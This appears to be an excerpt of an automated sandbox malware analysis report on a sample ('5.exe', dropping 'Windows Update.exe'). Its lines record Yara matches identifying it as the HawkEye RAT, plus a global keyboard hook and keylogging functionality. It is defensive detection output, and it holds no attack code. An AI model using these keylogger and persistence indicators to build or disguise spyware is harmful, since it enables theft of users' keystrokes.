          Source: Yara matchFile source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 5.exe PID: 1928, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 5.exe PID: 1060, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5844, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 6244, type: MEMORYSTR
          Installs a global keyboard hookShow sources
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Windows Update.exeJump to behavior
          Contains functionality to log keystrokes (.Net Source)Show sources
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs.Net Code: HookKeyboard
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs.Net Code: HookKeyboard
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs.Net Code: HookKeyboard
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs.Net Code: HookKeyboard
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404E07

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 10.0.Windows Update.exe.4b3fa72.56.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4b3fa72.56.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4a5dc92.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a5dc92.9.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4aadc72.51.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4aadc72.51.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.41ce65.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.41ce65.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38cb065.46.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38cb065.46.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4ae9c0d.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4ae9c0d.34.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a57e0d.53.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a57e0d.53.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4a26c92.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4a26c92.9.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4b3fa72.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4b3fa72.17.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a26c92.50.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a26c92.50.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4aadc72.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4aadc72.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4b3fa72.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4b3fa72.36.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4b7fa72.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4b7fa72.16.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
